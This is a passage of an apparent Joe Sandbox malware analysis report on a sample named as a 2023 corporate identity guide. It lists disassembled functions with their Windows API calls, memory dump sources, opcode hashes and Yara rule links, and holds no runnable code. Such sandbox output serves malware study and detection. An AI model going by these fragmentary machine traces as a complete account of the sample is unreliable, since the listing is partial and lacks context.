                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                          • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D2AAC Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000), ref: 6F3D2B6B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: dd65ba856a1d9aa0b9d5b3750cff7c640343ecdbc1d03cb36750d04af76bae1d
                                                                                                                                                                                          • Instruction ID: 8794bed2d67a90452726ed17bc0169f9409b164f3b64515634e65f3a97eb28a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd65ba856a1d9aa0b9d5b3750cff7c640343ecdbc1d03cb36750d04af76bae1d
                                                                                                                                                                                          • Instruction Fuzzy Hash: D14170B3800704DFDF25DFA8DB81B593768FF05368F20442AF8048A180DB35E9A58BA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                                                            • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                                                                          • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                                                          • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                          • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                                                                                                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                          • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                          • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                          • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D2993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(6F3D505C,00000004,00000040,6F3D504C), ref: 6F3D29B1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: e7a75023ad891b315f356df66ceef12f3eae6dc9afc7df4343e049a1bfab1d16
                                                                                                                                                                                          • Instruction ID: e0d84e80cf70e9e1749adb50acfaeaf097febff94a49400915a437f079c86d9d
                                                                                                                                                                                          • Opcode Fuzzy Hash: e7a75023ad891b315f356df66ceef12f3eae6dc9afc7df4343e049a1bfab1d16
                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F04EF1945A80DECBD0CF3C8844B097BE8FB1A326B55856EE288D6241E3745464DB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406127 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                          • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 10905977528c235e703cb230d4aceb2daa77919a392825a775d9fd0059444441
                                                                                                                                                                                          • Instruction ID: 6c8b7a7afc7aeb3e996b6e5dc2b2c32cd2e79b991574bcf3a276c199f91445cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10905977528c235e703cb230d4aceb2daa77919a392825a775d9fd0059444441
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D01232B04100D7DB10DBA4AF4899D73A49B84369B344577E102F11D0D6B9D9416A29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                                                                          • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                                                                                                                                          • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                                                                          • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,6F3D123B,?,6F3D12DF,00000019,6F3D11BE,-000000A0), ref: 6F3D1225
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                          • Opcode ID: b64e8e17e33fdcdeae8a6b2e334a96c24b3a04bbbe33cc92560e29c352ed08be
                                                                                                                                                                                          • Instruction ID: f30795da163f0c2281a1fdc02e0b0173678f603a1996ebc751c18b2f839d742b
                                                                                                                                                                                          • Opcode Fuzzy Hash: b64e8e17e33fdcdeae8a6b2e334a96c24b3a04bbbe33cc92560e29c352ed08be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43B01270A00400DFEF409B68CC46F34325CF701311F044004F600C0180C12048208A34
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
